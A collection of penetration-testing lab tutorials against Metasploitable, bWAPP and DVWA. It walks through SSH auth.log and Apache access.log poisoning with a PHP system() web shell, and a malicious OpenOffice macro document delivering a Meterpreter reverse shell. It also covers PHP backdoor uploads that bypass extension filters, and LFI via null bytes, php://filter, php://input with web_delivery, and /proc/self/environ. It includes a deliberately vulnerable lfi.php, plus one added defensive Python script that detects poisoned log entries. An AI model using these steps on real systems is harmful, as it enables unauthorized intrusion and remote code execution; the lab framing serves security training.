Web Server Exploitation with SSH Log Poisoning through LFI

In this article you will learn how to gain unauthorized access to a web server that suffers from a local file inclusion (LFI) vulnerability, using the SSH authentication log (auth.log) as the file to include. Before performing this attack, read my previous article, which shows how to create the local file inclusion vulnerability manually.

Attacker: Kali Linux
Target: Metasploitable 2

Open a terminal in your Kali Linux and connect to the target over the SSH service.

From the screenshot you can see I am connected to the target PC; now type the following command to check the permissions on the auth.log file:
ls -l /var/log/auth.log


If you look at the screenshot again, the highlighted permission bits show that read access has been granted on the auth.log file for users other than root, which is what the web server process will need later.


Since auth.log is readable, type the following command to watch its entries as they are written:
tail -f /var/log/auth.log

The highlighted text shows the log entry for the valid user msfadmin.


Now open another terminal in Kali and try to connect to the target's SSH service with a user name that does not exist, to confirm whether auth.log records an entry for an invalid user.

ssh hacker@192.168.1.105


When you switch back to the previous terminal you will find that an entry has been written for the invalid user hacker, as you can also see in the screenshot.


This confirms that auth.log records every successful and failed login attempt against the SSH service, and that the supplied user name is written into the log verbatim. Taking advantage of this, I will now send PHP code as the user name so that it is appended to auth.log as a new entry. The code calls system() on a request parameter named c; the single quotes keep the shell from interpreting the $ and ; characters:

ssh '<?php system($_GET["c"]); ?>'@192.168.1.105


When you check the log again, you will find the PHP code has been added as a new entry.


I have already created the LFI vulnerability manually inside the web server; if you want to create it yourself, see the previous article linked above.
In the given screenshot you can see that when I browse to lfi.php it shows an error that looks like a local file inclusion vulnerability (an include() warning naming the file parameter).

Now include the auth.log file through the file parameter by browsing to the following URL:
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

In the screenshot you can read the warning "Cannot execute a blank command". That is PHP's system() complaining that it was called with an empty string, which proves that the PHP code we injected into auth.log has been parsed and executed by include(); the c parameter was simply absent. Now we only need to supply a command through that parameter:



192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

This dumps the contents of auth.log and also executes the command passed through the c parameter. From the screenshot you can see both the log and the process list.


In the same way, execute pwd through the c parameter and view the result in the given screenshot.
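The poisoning step leaves a clear fingerprint in auth.log: a "user name" containing a PHP open tag or request-parameter access, which no real login name ever has. The following Python script is an added example for this section (it is not code from the original article): it parses sshd log lines of the shape shown above, pulls out the user-name field, and flags entries that carry PHP code or characters no login name may contain. The sample log lines, host name, PIDs and ports are constructed for the example.

```python
import re

# Constructed sample of /var/log/auth.log (not copied from the screenshots):
# a successful login, a failed login for a bogus user, and the two lines sshd
# writes when the "PHP code as user name" trick is used.
AUTH_LOG = """\
May  4 10:12:01 metasploitable sshd[4412]: Accepted password for msfadmin from 192.168.1.104 port 51122 ssh2
May  4 10:13:17 metasploitable sshd[4418]: Invalid user hacker from 192.168.1.104
May  4 10:13:19 metasploitable sshd[4418]: Failed password for invalid user hacker from 192.168.1.104 port 51130 ssh2
May  4 10:15:02 metasploitable sshd[4425]: Invalid user <?php system($_GET["c"]); ?> from 192.168.1.104
May  4 10:15:04 metasploitable sshd[4425]: Failed password for invalid user <?php system($_GET["c"]); ?> from 192.168.1.104 port 51140 ssh2
"""

# sshd message shapes we care about. The user name is whatever sits between
# the fixed phrase and " from <ip>", so a crafted name is captured verbatim.
SSHD_PATTERNS = [
    re.compile(r"Invalid user (?P<user>.*?) from (?P<ip>\d+\.\d+\.\d+\.\d+)\s*$"),
    re.compile(r"Failed password for invalid user (?P<user>.*?) from (?P<ip>\d+\.\d+\.\d+\.\d+) port"),
    re.compile(r"Accepted \w+ for (?P<user>.*?) from (?P<ip>\d+\.\d+\.\d+\.\d+) port"),
]

# Markers of code that would run if this log were ever handed to include():
# a PHP open tag, request-parameter access, or a command-execution function.
PHP_MARKERS = re.compile(
    r"<\?(php|=)|\$_(GET|POST|REQUEST)\b|\b(system|passthru|shell_exec|exec|eval)\s*\(",
    re.I,
)

# The character set a Unix login name is normally restricted to.
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_.-]*\$?$", re.I)


def parse_sshd_line(line):
    """Return (user, ip) for a recognised sshd line, or None for anything else."""
    for pattern in SSHD_PATTERNS:
        m = pattern.search(line)
        if m:
            return m.group("user"), m.group("ip")
    return None


def find_poisoned_entries(log_text):
    """Return (line_no, user, ip, reason) for every user name that looks injected."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), 1):
        parsed = parse_sshd_line(line)
        if not parsed:
            continue
        user, ip = parsed
        if PHP_MARKERS.search(user):
            hits.append((no, user, ip, "php code in user name"))
        elif not VALID_USERNAME.match(user):
            hits.append((no, user, ip, "user name contains characters no login name has"))
    return hits


if __name__ == "__main__":
    for no, user, ip, reason in find_poisoned_entries(AUTH_LOG):
        print(f"line {no}: {reason}: {user!r} from {ip}")
```

Run it as a cron job or feed it from a log shipper; the second rule catches payloads that avoid the obvious markers (for example a name carrying only `<?=`-free obfuscated code) because any shell metacharacter or bracket in a login name is already abnormal. On the server side, the fix is not to filter log lines but to keep log files unreadable to the web server user and to never pass user-controlled names to include().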

Exploiting Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets
Apache OpenOffice on Windows

Requirement
Attacker: Kali Linux
Victim PC: Windows 10


Open a terminal in Kali Linux and type msfconsole to load the Metasploit Framework.


Now type the following commands:
use exploit/multi/misc/openoffice_document_macro
msf exploit(openoffice_document_macro) > set payload windows/meterpreter/reverse_tcp
msf exploit(openoffice_document_macro) > set lhost 192.168.0.104 (IP of the attacker's Kali host)
msf exploit(openoffice_document_macro) > set srvhost 192.168.0.104
msf exploit(openoffice_document_macro) > set lport 4444
msf exploit(openoffice_document_macro) > exploit
From the screenshot you can see the highlighted text showing the path of the malicious .odt file.


The malicious .odt file has been generated and stored on your local machine at the following path:
/root/.msf4/local/msf.odt


Now send msf.odt to the victim. As soon as they download and open it (and, at the Medium macro security level, click through the prompt to enable macros), the macro runs and you get a Meterpreter shell on the victim's computer. Keep the msfconsole session running, because the module also hosts the payload stager and the reverse_tcp handler that the macro connects back to.

File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security levels of Unrestricted File Upload in bWAPP. If you want to know more about the various kinds of file upload vulnerability, read the previous article, which may help you understand this one more clearly.

LOW SECURITY

Open the target IP in the browser: 192.168.0.106/bWAPP/login.php. Enter the user name and password as bee and bug respectively.


Set the security level to low, choose Unrestricted File Upload from the bug list box and click Hack.


Create a PHP backdoor with msfvenom and start a multi/handler listener in the background; in the screenshot you can see I have selected meter.php for upload in the form that expects an image.


When the upload succeeds, the web server returns a link to the directory where the "image" was saved so that you can view it. Since we have not uploaded a real image, clicking the link "here" makes the server execute our PHP backdoor instead.


Clicking the link "here" runs the backdoor on the server, and we receive the reverse connection as a Meterpreter session inside the Metasploit Framework.
From the screenshot you can see that Metasploit session 1 is open.


MEDIUM SECURITY

At medium security the same procedure no longer works, because uploads with a .php extension are refused. However, you only need to change the extension of the PHP backdoor to bypass medium security: the check blocks .php but not the other extensions Apache hands to the PHP interpreter. In the image below you can see I have selected meter.php3 for upload.

Now repeat the same steps: run multi/handler in the background and click the link "here" to receive the Meterpreter session.


GREAT!!! From the screenshot you can see Metasploit session 2 is open.


HIGH SECURITY
At high security both of the uploads above fail, so again you need a small change to the extension of the PHP backdoor: give it a double extension so that the last extension is an image type, which is all the check looks at.
From the screenshot you can read the file name high.php.png which I selected for upload.


Our file is uploaded successfully. Now right-click the link "here" and copy the link location, keeping multi/handler running in the background. Opening the link directly will not give a shell this time, because Apache serves a file ending in .png as a static image rather than passing it to PHP.


To bypass high security of file upload in bWAPP we need to switch both the bug and the security level.
Set the security level to low, choose the bug Remote & Local File Inclusion and click Hack.

The requested page, which suffers from RFI and LFI, opens. It asks you to select a language from the drop-down list; when you click Go, the selected language file name is placed in the URL and included by the page.

I uploaded the PHP backdoor under high security, but I execute it at low security through the LFI vulnerability: include() parses whatever file it is given as PHP, regardless of the file's extension, so the .png name that got the file past the upload filter is no obstacle here. Now manipulate the URL as shown in the screenshot:

change http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png


When the above URL is executed in the browser you get the victim's reverse connection inside Metasploit.
Congrats!!! From the screenshot you can see Metasploit session 3 is open.
Hence we have bypassed all three security levels inside bWAPP.

5 ways to Exploit LFI Vulnerability

The main aim of this article is to share several techniques for attacking a web server that suffers from a file inclusion vulnerability. As we know, an LFI vulnerability lets a user include a file on the server through a parameter in the URL. In this article I have used two different platforms, bWAPP and DVWA, which contain file inclusion vulnerabilities, and through them I have performed the LFI attack in five different ways.

Basic local file inclusion

Open the target IP in the browser and log in to bWAPP as bee:bug, then choose the bug Remote & Local File Inclusion and click Hack.


The requested page, which suffers from RFI and LFI, opens. It asks you to select a language from the drop-down list; when you click Go, the selected language file name is placed in the URL and included by the page. To perform the basic attack, change

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd

In the basic LFI attack we read a file directly, either by traversing out of the web root with ../ sequences or simply by giving an absolute path starting with /. In the screenshot below you can see that the password file is displayed when the above URL is executed in the browser.


Null byte

In some scenarios the basic attack may not work because of a higher security level: in the image below you can see that I fail to read the password file when executing the same path in the URL. This typically happens when the application appends something to the supplied name (such as a fixed .php extension) before including it. In that case go for the NULL BYTE attack: on PHP versions before 5.3.4 the file functions treat the path as a C string and stop at the first null byte, so whatever the application appends after our %00 is discarded.

Now turn on Burp Suite to capture the browser request: select the Proxy tab and switch Intercept on. Do not forget to set the browser proxy when using Burp Suite.


Inside Burp Suite, send the intercepted request to Repeater.


In Repeater you can analyse the request you send and the response it produces. From the screenshot it is clear that /etc/passwd is not working and I cannot read the password file.


In the following screenshot you can see that I sent the request again after adding a null character (%00) at the end of the path /etc/passwd and clicking Go. On the right side of the window the password file is returned in the response.


Base64 encoded

There is another way to exploit LFI when you cannot view a PHP file's content because the server executes it instead of returning its source: use the php://filter stream wrapper, which base64-encodes the file before it is returned, so the PHP inside is never executed and the complete source arrives in the response.

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

In the screenshot you can see the content of the password file encoded in base64; copy the whole encoded text.


I am using HackBar, a Firefox plugin, to decode the copied text.


A pop-up box opens; paste the copied encoded text into it and click OK.


From the given screenshot you can view the result and read the content of the password file.


PHP Input

Using the php://input wrapper we can execute injected PHP code through the LFI vulnerability: when include() is given php://input it reads the raw POST body of the request and executes it as PHP (this requires allow_url_include=On in php.ini, which is why it does not work everywhere). With the help of HackBar, first load the URL of the target web page, as you can see in the given screenshot.


Now manipulate the above URL by replacing the language value with the php://input wrapper.


Then tick the check box to enable Post data, which sends the request as a POST, and put the PHP command-execution code in the text area, as shown in the following screenshot; finally click Execute.

This will list the directories of the victim PC.


Now it is time to get a reverse connection from the victim: open a terminal in Kali Linux and type msfconsole to start the Metasploit Framework, then type the following commands.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit
Target 1 is the PHP target of web_delivery, so the payload must be a php/ payload; the victim here is a Linux web server and the code will run inside its PHP interpreter.
Copy the highlighted PHP one-liner shown in the window below.


Paste the copied PHP code into the POST data (the body that php://input includes), as shown in the image, and execute it.


When the request executes, the attacker gets the victim's Meterpreter session inside Metasploit.
msf exploit(web_delivery) > sessions -i 1
meterpreter > sysinfo


Proc/self/environ
If the server is outdated, we can exploit the LFI by including /proc/self/environ, the environment of the process serving our request. In CGI-style configurations that environment contains HTTP_USER_AGENT, the value of our own User-Agent header, so we place PHP code there to execute commands. On current Apache builds with mod_php the file either is not readable or does not carry the request headers, which is why this technique only works on older setups.



Now start Burp Suite, capture the browser request and send it to Repeater.


Put the PHP command-execution code inside the User-Agent header and send the request with the GET parameters 192.168.1.8/lfi/lfi.php?file=/proc/self/environ&cmd=id, as shown in the image below. On the right side of the window you can see the highlighted result in the response.

Exploit Webserver through Log Injection with LFI

In this article you will see how to perform local file inclusion log poisoning against the target machine and gain unauthorized access with the help of the Apache access.log file.

Attacker: Kali Linux
Target: Metasploitable 2

Connect to the target using the SSH service as shown in the following image.

Now obtain a root shell with sudo and create a folder "lfi" inside /var/www:
cd /var/www
mkdir lfi


Now create a PHP file that includes whatever file name is supplied through the file parameter. Because the value reaches include() unchanged, any file the web server can read (log files included) can be pulled in and is parsed as PHP, which is what lets us execute injected code and gain unauthorized access to the target PC.

<?php
   // Deliberately vulnerable: the file name comes straight from the query string
   // and is handed to include() without any validation.
   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
   ?>
I have saved the above PHP code in a text file as lfi.php and shared it from the attacker machine.


To download lfi.php into the lfi directory, type the following command:


Now browse to the following URL: 192.168.1.8/lfi/lfi.php
In the given screenshot you can see that when I browse to lfi.php it shows an error that looks like a local file inclusion vulnerability (an include() warning naming the file parameter).


Now I will try to open the Apache access.log. To make it readable by the web server, first grant read permission on the apache2 log directory and its access.log, then include the log through the file parameter.


Now include access.log through the file parameter by browsing to the following URL:
192.168.1.8/lfi/lfi.php?file=/var/log/apache2/access.log
Now turn on Burp Suite to capture the request for the same web page.


Here you get the intercepted request; we need to inject our PHP command-execution code into the User-Agent header by replacing the highlighted data.



Put the PHP one-liner that runs the c parameter with system() inside the User-Agent header and send the request with the GET parameters 192.168.1.8/lfi/lfi.php?file=/var/log/apache2/access.log&c=ps, as shown in the image below, then click Forward. Apache writes the User-Agent value verbatim into access.log, and the LFI then includes that log and executes the code, passing ps through the c parameter.


This dumps the log data and also executes the command given through the c parameter. From the screenshot you can see both the log and the process list.


In the same manner, execute lsb_release -a through the c parameter and view the result in the given screenshot.